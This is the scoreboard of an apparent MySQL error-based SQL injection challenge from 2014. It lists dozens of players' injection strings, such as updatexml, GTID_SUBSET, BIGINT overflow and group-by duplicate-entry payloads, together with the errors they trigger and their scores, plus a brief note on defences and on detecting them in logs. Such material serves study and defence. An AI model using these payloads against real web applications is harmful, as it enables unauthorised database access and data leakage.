MySQL Error-Based Injection Game
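Scoreboard

Each row lists a submitted input (X), the MySQL error it triggered (ErrText, ErrNo) and the score it received. Every entry forces a server-side error whose message carries the value of version() / @@version, so the technique depends on the application returning raw database error text to the client. Bound query parameters and generic error responses remove that channel, and error numbers 1060, 1062, 1105, 1367, 1690 and 1772 raised by a web-facing query are a useful detection signal in database and application logs.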
# Name X ErrText ErrNo Score SUM(Score) Last Submit 1 snoopdogg '-(select*from(select name_const(version(),1),name_const(version(),1))p)# Duplicate column name 1060 56 1009 2014-10-04 21:35:30 '=0 group by elt(rand(),version())having min(0)# Duplicate entry 1062 81 '/updatexml(0,concat(0xa,version()),0)# XPATH syntax error: 1105 90 '/updatexml(0,concat('$_',version()),0)# Unknown XPATH variable at: 1105 89 '-updatexml(1,concat('a=.',version()),1)# XPATH error: comparison of two nodesets is not supported: 1105 88 '-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)# Illegal double 1367 79 '/polygon((select*from(select name_const(version(),1))o))# Illegal non geometric 1367 71 '--~(select*from(select@@version)f)# BIGINT value is out of range in 1690 93 '-~(select*from(select@@version)x)*2# BIGINT UNSIGNED value is out of range in 1690 92 1e308'*(select*from(select@@version)x)# DOUBLE value is out of range in 1690 90 '-(select~b*a*a*a from(select~0/.1 a,version()b)x)# DECIMAL value is out of range in 1690 78 '-GTID_SUBSET(@@version,0)# Malformed GTID set specification 1772 102 2 @Black2Fan '-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)# Duplicate column name 1060 56 998 2014-10-02 09:04:38 '=0 group by elt(rand(),version())having sum(0)# Duplicate entry 1062 81 '|updatexml(1,concat('a=.',version()),1)# XPATH error: comparison of two nodesets is not supported: 1105 88 '|updatexml(0,concat('$_',version()),2)# Unknown XPATH variable at: 1105 89 '-updatexml(0,concat(0x1,version()),2)# XPATH syntax error: 1105 90 '|updatexml(0,lpad(.1,350,hex(hex(version()))),1)# Illegal double 1367 79 '|polygon((select*from(select name_const(version(),1))x))# Illegal non geometric 1367 71 1e308'*(select*from(select@@version)x)# DOUBLE value is out of range in 1690 90 '--~(select*from(select@@version)f)# BIGINT value is out of range in 1690 93 '|(~(select*from(select@@version)f)*2)# BIGINT UNSIGNED value is out of range in 1690 90 
'|~(select*from(select@@version)x)*cast(1e99as decimal(65))# DECIMAL value is out of range in 1690 69 '|GTID_SUBSET(@@version,0)# Malformed GTID set specification 1772 102 3 zuzzz '|(select*from(select name_const(version(),1),name_const(version(),1))a)# Duplicate column name 1060 56 936 2014-10-03 08:35:45 '||1 group by mid(version(),rand())having min(1)# Duplicate entry 1062 80 '|UpdateXML(1,concat('/',version()),1)# XPATH syntax error: 1105 90 '|UpdateXML(1,concat('$_',version()),1)# Unknown XPATH variable at: 1105 89 '|ExtractValue(1,concat('/a[x=y]',version()))# XPATH error: comparison of two nodesets is not supported: 1105 83 '|Polygon((select*from(select name_const(version(),1))b))# Illegal non geometric 1367 71 '|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)# Illegal double 1367 66 '|(select!x-~0.FROM(select+version()x)f)# BIGINT UNSIGNED value is out of range in 1690 88 '|(select-9223372036854775808-(x||1)FROM(select+version()x)z)# BIGINT value is out of range in 1690 67 '|(select pow(2,~x)FROM(select+version()x)z)# DOUBLE value is out of range in 1690 84 '|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)# DECIMAL value is out of range in 1690 60 '|GTID_SUBSET(version(),0)# Malformed GTID set specification 1772 102 4 yarbabin '||1 group by concat(left(version(),9),rand(0)|0) having max(0)# Duplicate entry 1062 65 153 2014-10-03 10:07:48 '|(select!x-~0.FROM(select+version()x)f)# BIGINT UNSIGNED value is out of range in 1690 88 5 lel '-updatexml(1,concat('.a=a',version()),1)# XPATH syntax error: 1105 87 87 2014-10-01 17:12:36 6 Karnalzi 'union select count(*)from test.news group by concat(version(),floor(rand(9)*3)),' Duplicate entry 1062 47 47 2014-10-02 14:32:30 7 xxxx ' UnIoN SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` group By CoNcAt(version(), rand(RaNd(4) * 2)), ' Duplicate entry 1062 32 32 2014-10-01 16:55:06 8 Nytro ' union select count(*) From `test`.`news` where 1 group by concat(version(),floor(rand(1337)* 2)), ' 
Duplicate entry 1062 28 28 2014-10-02 11:50:06 9 karnalzi 'union all select count(*)from test.news where id=1 or 1=1 group by concat (version(),floor(rand(1337)*2)),' Duplicate entry 1062 21 21 2014-10-03 09:09:11 10 X ' UnIoN AlL SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` WhErE 1 = 1 GrOuP By CoNcAt(VeRsIoN(), FlOoR(RaNd(1337) * 2)), ' Duplicate entry 1062 13 13 2014-10-02 11:47:23
# | Name | X | ErrText | ErrNo | Score | SUM(Score) | Last Submit |
---|---|---|---|---|---|---|---|
1 | snoopdogg | '-(select*from(select name_const(version(),1),name_const(version(),1))p)# | Duplicate column name | 1060 | 56 | 1009 | 2014-10-04 21:35:30 |
'=0 group by elt(rand(),version())having min(0)# | Duplicate entry | 1062 | 81 | ||||
'/updatexml(0,concat(0xa,version()),0)# | XPATH syntax error: | 1105 | 90 | ||||
'/updatexml(0,concat('$_',version()),0)# | Unknown XPATH variable at: | 1105 | 89 | ||||
'-updatexml(1,concat('a=.',version()),1)# | XPATH error: comparison of two nodesets is not supported: | 1105 | 88 | ||||
'-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)# | Illegal double | 1367 | 79 | ||||
'/polygon((select*from(select name_const(version(),1))o))# | Illegal non geometric | 1367 | 71 | ||||
'--~(select*from(select@@version)f)# | BIGINT value is out of range in | 1690 | 93 | ||||
'-~(select*from(select@@version)x)*2# | BIGINT UNSIGNED value is out of range in | 1690 | 92 | ||||
1e308'*(select*from(select@@version)x)# | DOUBLE value is out of range in | 1690 | 90 | ||||
'-(select~b*a*a*a from(select~0/.1 a,version()b)x)# | DECIMAL value is out of range in | 1690 | 78 | ||||
'-GTID_SUBSET(@@version,0)# | Malformed GTID set specification | 1772 | 102 | ||||
2 | @Black2Fan | '-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)# | Duplicate column name | 1060 | 56 | 998 | 2014-10-02 09:04:38 |
'=0 group by elt(rand(),version())having sum(0)# | Duplicate entry | 1062 | 81 | ||||
'|updatexml(1,concat('a=.',version()),1)# | XPATH error: comparison of two nodesets is not supported: | 1105 | 88 | ||||
'|updatexml(0,concat('$_',version()),2)# | Unknown XPATH variable at: | 1105 | 89 | ||||
'-updatexml(0,concat(0x1,version()),2)# | XPATH syntax error: | 1105 | 90 | ||||
'|updatexml(0,lpad(.1,350,hex(hex(version()))),1)# | Illegal double | 1367 | 79 | ||||
'|polygon((select*from(select name_const(version(),1))x))# | Illegal non geometric | 1367 | 71 | ||||
1e308'*(select*from(select@@version)x)# | DOUBLE value is out of range in | 1690 | 90 | ||||
'--~(select*from(select@@version)f)# | BIGINT value is out of range in | 1690 | 93 | ||||
'|(~(select*from(select@@version)f)*2)# | BIGINT UNSIGNED value is out of range in | 1690 | 90 | ||||
'|~(select*from(select@@version)x)*cast(1e99as decimal(65))# | DECIMAL value is out of range in | 1690 | 69 | ||||
'|GTID_SUBSET(@@version,0)# | Malformed GTID set specification | 1772 | 102 | ||||
3 | zuzzz | '|(select*from(select name_const(version(),1),name_const(version(),1))a)# | Duplicate column name | 1060 | 56 | 936 | 2014-10-03 08:35:45 |
'||1 group by mid(version(),rand())having min(1)# | Duplicate entry | 1062 | 80 | ||||
'|UpdateXML(1,concat('/',version()),1)# | XPATH syntax error: | 1105 | 90 | ||||
'|UpdateXML(1,concat('$_',version()),1)# | Unknown XPATH variable at: | 1105 | 89 | ||||
'|ExtractValue(1,concat('/a[x=y]',version()))# | XPATH error: comparison of two nodesets is not supported: | 1105 | 83 | ||||
'|Polygon((select*from(select name_const(version(),1))b))# | Illegal non geometric | 1367 | 71 | ||||
'|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)# | Illegal double | 1367 | 66 | ||||
'|(select!x-~0.FROM(select+version()x)f)# | BIGINT UNSIGNED value is out of range in | 1690 | 88 | ||||
'|(select-9223372036854775808-(x||1)FROM(select+version()x)z)# | BIGINT value is out of range in | 1690 | 67 | ||||
'|(select pow(2,~x)FROM(select+version()x)z)# | DOUBLE value is out of range in | 1690 | 84 | ||||
'|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)# | DECIMAL value is out of range in | 1690 | 60 | ||||
'|GTID_SUBSET(version(),0)# | Malformed GTID set specification | 1772 | 102 | ||||
4 | yarbabin | '||1 group by concat(left(version(),9),rand(0)|0) having max(0)# | Duplicate entry | 1062 | 65 | 153 | 2014-10-03 10:07:48 |
'|(select!x-~0.FROM(select+version()x)f)# | BIGINT UNSIGNED value is out of range in | 1690 | 88 | ||||
5 | lel | '-updatexml(1,concat('.a=a',version()),1)# | XPATH syntax error: | 1105 | 87 | 87 | 2014-10-01 17:12:36 |
6 | Karnalzi | 'union select count(*)from test.news group by concat(version(),floor(rand(9)*3)),' | Duplicate entry | 1062 | 47 | 47 | 2014-10-02 14:32:30 |
7 | xxxx | ' UnIoN SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` group By CoNcAt(version(), rand(RaNd(4) * 2)), ' | Duplicate entry | 1062 | 32 | 32 | 2014-10-01 16:55:06 |
8 | Nytro | ' union select count(*) From `test`.`news` where 1 group by concat(version(),floor(rand(1337)* 2)), ' | Duplicate entry | 1062 | 28 | 28 | 2014-10-02 11:50:06 |
9 | karnalzi | 'union all select count(*)from test.news where id=1 or 1=1 group by concat (version(),floor(rand(1337)*2)),' | Duplicate entry | 1062 | 21 | 21 | 2014-10-03 09:09:11 |
10 | X | ' UnIoN AlL SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` WhErE 1 = 1 GrOuP By CoNcAt(VeRsIoN(), FlOoR(RaNd(1337) * 2)), ' | Duplicate entry | 1062 | 13 | 13 | 2014-10-02 11:47:23 |

# | Name | X | ErrNo | Score | SUM(Score) | Last Submit |
---|---|---|---|---|---|---|
1 | @Black2Fan | '-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)# | 1060 | 56 | 495 | 2014-10-01 08:55:54 |
'=0 group by elt(rand(),version())having sum(0)# | 1062 | 81 | ||||
'-updatexml(0,repeat(version(),2),2)# | 1105 | 92 | ||||
'|polygon((select*from(select name_const(version(),1))x))# | 1367 | 71 | ||||
'--~(select*from(select@@version)f)# | 1690 | 93 | ||||
'|GTID_SUBSET(@@version,0)# | 1772 | 102 | ||||
2 | kamior | '/(select*from(select+name_const(version(),1),name_const(version(),1))a)# | 1060 | 56 | 495 | 2014-10-01 11:41:33 |
'=0 group by elt(rand(),version())having min(0)# | 1062 | 81 | ||||
'/updatexml(0,repeat(version(),2),0)# | 1105 | 92 | ||||
'-polygon((select*from(select name_const(version(),1))o))# | 1367 | 71 | ||||
'--~(select*from(select@@version)f)# | 1690 | 93 | ||||
'/gtid_subset(@@version,0)# | 1772 | 102 | ||||
3 | mb | '|(select*from(select name_const(version(),1),name_const(version(),1))a)# | 1060 | 56 | 322 | 2014-09-17 20:03:18 |
'=0 group by elt(rand(),version())having min(0)# | 1062 | 81 | ||||
'|updatexml(1,repeat(version(),2),1)# | 1105 | 92 | ||||
'--~(select*from(select@@version)f)# | 1690 | 93 | ||||
4 | snoopdogg | '<1 group by elt(rand(),version())having min(0)# | 1062 | 81 | 243 | 2014-10-01 13:20:39 |
'|polygon((select*from(select name_const(version(),1))p))# | 1367 | 71 | ||||
'|!(select*from(select@@version)x)-~0# | 1690 | 91 | ||||
5 | ZiX | 'or 1 group by concat(version(),floor(rand(0)*2)) having min(0)or''=' | 1062 | 60 | 133 | 2014-09-15 23:02:45 |
' and extractvalue(rand(0),concat(0x0a,version()))or''=' | 1105 | 73 | ||||
6 | 123 | '--~(select*from(select@@version)f)# | 1690 | 93 | 93 | 2014-09-16 19:44:00 |
7 | der | '--~(select*from(select@@version)f)# | 1690 | 92 | 92 | 2014-09-15 20:37:58 |
8 | r | '|(select!x-~0.FROM(select+version()x)f)# | 1690 | 88 | 88 | 2014-09-15 19:49:35 |
9 | BlackFan | '|(select!x-~0.FROM(select@@version x)f)# | 1690 | 88 | 88 | 2014-10-01 14:08:20 |
10 | asdf | 'UnIoN SeLeCt CoUnT(`TeXt`) FrOm test.news WhErE 1=1 GrOuP By CoNcAt(VeRsIoN(),FlOoR(RaNd(1337)*2)),' | 1062 | 28 | 28 | 2014-09-15 23:54:40 |